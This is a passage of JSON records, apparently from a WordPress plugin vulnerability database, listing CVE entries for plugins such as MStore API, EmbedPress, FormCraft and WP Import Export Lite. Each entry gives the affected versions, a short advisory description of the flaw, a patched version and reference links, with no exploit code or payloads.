link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1aed51a2-9fd4-43bb-b72d-ae8e51ee6e87?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1aed51a2-9fd4-43bb-b72d-ae8e51ee6e87?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L222\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L222\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3201","slug":"mstore-api","versionEndExcluding":"3.9.7","description":"The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_new_order_title function. This makes it possible for unauthenticated attackers to update new order title via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb5cb1a5-30d2-434f-90f9-d37aecfbe158?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cb5cb1a5-30d2-434f-90f9-d37aecfbe158?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L240\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L240\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3200","slug":"mstore-api","versionEndExcluding":"3.9.7","description":"The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_new_order_message function. This makes it possible for unauthenticated attackers to update new order message via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L248\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L248\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78f3c503-e255-44d2-8432-48dc2c5f553d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78f3c503-e255-44d2-8432-48dc2c5f553d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3198","slug":"mstore-api","versionEndExcluding":"3.9.7","description":"The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_status_order_message function. This makes it possible for unauthenticated attackers to update status order message via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5f30190-4576-4c2b-b069-72501538733b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5f30190-4576-4c2b-b069-72501538733b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2925048%40mstore-api&new=2925048%40mstore-api&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L264\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/trunk\\\/mstore-api.php#L264\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2592","slug":"formcraft-form-builder","versionEndExcluding":"3.9.7","description":"The FormCraft WordPress plugin before 3.9.7 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4298960-eaba-4185-a730-3e621d9680e1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d4298960-eaba-4185-a730-3e621d9680e1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4948","slug":"flying-press ","versionEndExcluding":"3.9.7","description":"The FlyingPress plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on its AJAX actions in versions up to, and including, 3.9.6. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to interact with the plugin in ways administrators are intended to. One action (save_config) allows for the configuration of an external CDN. This could be used to include malicious javascript from a source controlled by the attacker.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d1d541b-7010-4dbf-9b1c-d59c84390065?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d1d541b-7010-4dbf-9b1c-d59c84390065?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-flyingpress-plugin-fixed-broken-access-control-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-flyingpress-plugin-fixed-broken-access-control-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23708","slug":"visualizer","versionEndExcluding":"3.9.5","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Themeisle Visualizer: Tables and Charts Manager for WordPress plugin <=\u00a03.9.4 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/visualizer\\\/wordpress-visualizer-tables-and-charts-manager-for-wordpress-plugin-3-9-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/visualizer\\\/wordpress-visualizer-tables-and-charts-manager-for-wordpress-plugin-3-9-4-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9652","slug":"locatoraid","versionImpact":"3.9.47","versionEndExcluding":"3.9.48","description":"The Locatoraid Store Locator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_POST keys in all versions up to, and including, 3.9.47 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.9.48, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7821b17a-7da7-434f-8e3f-540e7d7cf6bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7821b17a-7da7-434f-8e3f-540e7d7cf6bb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/locatoraid\\\/trunk\\\/happ2\\\/modules\\\/input\\\/lib.php#L705\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/locatoraid\\\/trunk\\\/happ2\\\/modules\\\/input\\\/lib.php#L705\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3167512%40locatoraid&new=3167512%40locatoraid&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3167512%40locatoraid&new=3167512%40locatoraid&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11687","slug":"nextcart-woocommerce-migration","versionImpact":"3.9.2","versionEndExcluding":"3.9.4","description":"The Next-Cart Store to WooCommerce Migration plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 3.9.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202036%40nextcart-woocommerce-migration&new=3202036%40nextcart-woocommerce-migration&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202036%40nextcart-woocommerce-migration&new=3202036%40nextcart-woocommerce-migration&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abcebcdb-e22a-4b6c-86db-f95b00260446?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abcebcdb-e22a-4b6c-86db-f95b00260446?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6624","slug":"json-api-user","versionImpact":"3.9.3","versionEndExcluding":"3.9.4","description":"The JSON API User plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.9.3. This is due to improper controls on custom user meta fields. This makes it possible for unauthenticated attackers to register as administrators on the site. The plugin requires the JSON API plugin to also be installed.","recommendation":"Update to version 3.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4a26f60-5912-4d4a-8ef8-e4357c1fb1ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4a26f60-5912-4d4a-8ef8-e4357c1fb1ff?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/json-api-user\\\/trunk\\\/controllers\\\/User.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/json-api-user\\\/trunk\\\/controllers\\\/User.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/json-api-user\\\/trunk\\\/controllers\\\/User.php#L187\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/json-api-user\\\/trunk\\\/controllers\\\/User.php#L187\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115185\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115185\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5061","slug":"wp-import-export-lite","versionImpact":"3.9.29","versionEndExcluding":"3.9.30","description":"The WP Import Export Lite plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'wpie_parse_upload_data' function in all versions up to, and including, 3.9.29. This makes it possible for authenticated attackers, with Subscriber-level access and above, and permissions granted by an Administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible. The vulnerability was partially patched in version 3.9.29.","recommendation":"Update to version 3.9.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-import-export-lite\\\/trunk\\\/includes\\\/classes\\\/import\\\/class-wpie-upload-validate.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-import-export-lite\\\/trunk\\\/includes\\\/classes\\\/import\\\/class-wpie-upload-validate.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-import-export-lite\\\/trunk\\\/includes\\\/classes\\\/import\\\/class-wpie-upload-validate.php#L89\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-import-export-lite\\\/trunk\\\/includes\\\/classes\\\/import\\\/class-wpie-upload-validate.php#L89\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3323402\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3323402\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338701\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3338701\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c0f3248-fef6-48a5-b2e1-f2778528fba1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c0f3248-fef6-48a5-b2e1-f2778528fba1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4577","slug":"easy-testimonials","versionEndExcluding":"3.9.3","description":"The Easy Testimonials WordPress plugin before 3.9.3 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85d9fad7-ba3d-4140-ae05-46262d2643e6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/85d9fad7-ba3d-4140-ae05-46262d2643e6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6207","slug":"wp-import-export-lite","versionImpact":"3.9.28","versionEndExcluding":"3.9.29","description":"The WP Import Export Lite plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'wpie_tempalte_import' function in all versions up to, and including, 3.9.28. This makes it possible for authenticated attackers, with Subscriber-level access and above, and permissions granted by an Administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.9.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-import-export-lite\\\/trunk\\\/includes\\\/classes\\\/class-wpie-common-action.php#L386\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-import-export-lite\\\/trunk\\\/includes\\\/classes\\\/class-wpie-common-action.php#L386\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3323402\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3323402\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/188eef67-de66-49c2-aa6c-2cf3b886ff66?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/188eef67-de66-49c2-aa6c-2cf3b886ff66?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2839","slug":"wp-import-export-lite","versionImpact":"3.9.27","versionEndExcluding":"3.9.28","description":"The WP Import Export Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018wpiePreviewData\u2019 function in all versions up to, and including, 3.9.27 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.9.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-import-export-lite\\\/trunk\\\/assets\\\/js\\\/wpie-export-admin.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-import-export-lite\\\/trunk\\\/assets\\\/js\\\/wpie-export-admin.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274100\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274100\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8ca1ead-1bc5-4ccc-9034-559db27f5e82?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8ca1ead-1bc5-4ccc-9034-559db27f5e82?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4476","slug":"locatoraid","versionEndExcluding":"3.9.24","description":"The Locatoraid Store Locator WordPress plugin before 3.9.24 does not sanitise and escape the lpr-search parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ca22b22-fe89-42be-94ec-b164838bcf50\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3ca22b22-fe89-42be-94ec-b164838bcf50\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5750","slug":"embedpress","versionImpact":"3.9.1","versionEndExcluding":"3.9.2","description":"The EmbedPress WordPress plugin before 3.9.2 does not sanitise and escape a parameter before outputting it back in the page containing a specific content, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 3.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cf323f72-8374-40fe-9e2e-810e46de1ec8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cf323f72-8374-40fe-9e2e-810e46de1ec8\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5749","slug":"embedpress","versionImpact":"3.9.1","versionEndExcluding":"3.9.2","description":"The EmbedPress WordPress plugin before 3.9.2 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 3.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3931daac-3899-4169-8625-4c95fd2adafc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3931daac-3899-4169-8625-4c95fd2adafc\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2734","slug":"mstore-api","versionEndExcluding":"3.9.2","description":"The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.1. This is due to insufficient verification on the user being supplied during the cart sync from mobile REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/3.9.0\\\/controllers\\\/flutter-woo.php#L911\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/3.9.0\\\/controllers\\\/flutter-woo.php#L911\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2915729%40mstore-api&old=2913397%40mstore-api&sfp_email=&sfph_mail=#file59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2915729%40mstore-api&old=2913397%40mstore-api&sfp_email=&sfph_mail=#file59\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5881d16c-84e8-4610-8233-cfa5a94fe3f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5881d16c-84e8-4610-8233-cfa5a94fe3f9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4384","slug":"stream","versionEndExcluding":"3.9.2","description":"The Stream WordPress plugin before 3.9.2 does not prevent users with little privileges on the site (like subscribers) from using its alert creation functionality, which may enable them to leak sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b506252-6f37-439e-8984-7316d5cca2e5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2b506252-6f37-439e-8984-7316d5cca2e5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4316","slug":"embedpress","versionImpact":"3.9.16","versionEndExcluding":"3.9.17","description":"The EmbedPress \u2013 Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 3.9.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.9.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/trunk\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Elementor.php#L3076\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embedpress\\\/trunk\\\/EmbedPress\\\/Elementor\\\/Widgets\\\/Embedpress_Elementor.php#L3076\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2af03168-9344-4db0-9b69-2ad1fdb6d472?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2af03168-9344-4db0-9b69-2ad1fdb6d472?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0477","slug":"auto-post-thumbnail","versionEndExcluding":"3.9.16","description":"The Auto Featured Image (Auto Post Thumbnail) WordPress plugin before 3.9.16 includes an AJAX endpoint that allows any user with at least Author privileges to upload arbitrary files, such as PHP files. This is caused by incorrect file extension validation.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5ef74a2-e04a-4a14-bd0e-d6910cd1c4b4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5ef74a2-e04a-4a14-bd0e-d6910cd1c4b4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1803","slug":"embedpress","versionImpact":"3.9.12","versionEndExcluding":"3.9.13","description":"The EmbedPress \u2013 Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to unauthorized access of functionality due to insufficient authorization validation on the PDF embed block in all versions up to, and including, 3.9.12. This makes it possible for authenticated attackers, with contributor-level access and above, to embed PDF blocks.","recommendation":"Update to version 3.9.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175e08ce-aec2-427a-90e0-f955711d58b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/175e08ce-aec2-427a-90e0-f955711d58b2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3055856\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3055856\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0817","slug":"formcraft3","versionImpact":"3.9.11","versionEndExcluding":"3.9.12","description":"The FormCraft plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.9.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 3.9.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/formcraft-premium-wordpress-form-builder\\\/5335056\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/formcraft-premium-wordpress-form-builder\\\/5335056\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/formcraft-wp.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/formcraft-wp.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ae0710a-8c9b-41b0-860f-ae79b7ed1ee4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ae0710a-8c9b-41b0-860f-ae79b7ed1ee4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13783","slug":"formcraft3","versionImpact":"3.9.11","versionEndExcluding":"3.9.12","description":"The FormCraft plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in formcraft-main.php in all versions up to, and including, 3.9.11. This makes it possible for authenticated attackers, with Subscriber-level access and above, to export all plugin data which may contain sensitive information from form submissions.","recommendation":"Update to version 3.9.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/formcraft-premium-wordpress-form-builder\\\/5335056\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/formcraft-premium-wordpress-form-builder\\\/5335056\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/formcraft-wp.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/formcraft-wp.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7b45b1d-7ed6-4382-b69c-45ea45e4d0db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7b45b1d-7ed6-4382-b69c-45ea45e4d0db?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1565","slug":"embedpress","versionImpact":"3.9.10","versionEndExcluding":"3.9.11","description":"The EmbedPress \u2013 Embed PDF, YouTube, Google Docs, Vimeo, Wistia Videos, Audios, Maps & Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the PDF Widget URL in all versions up to, and including, 3.9.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.9.11, or a newer patched 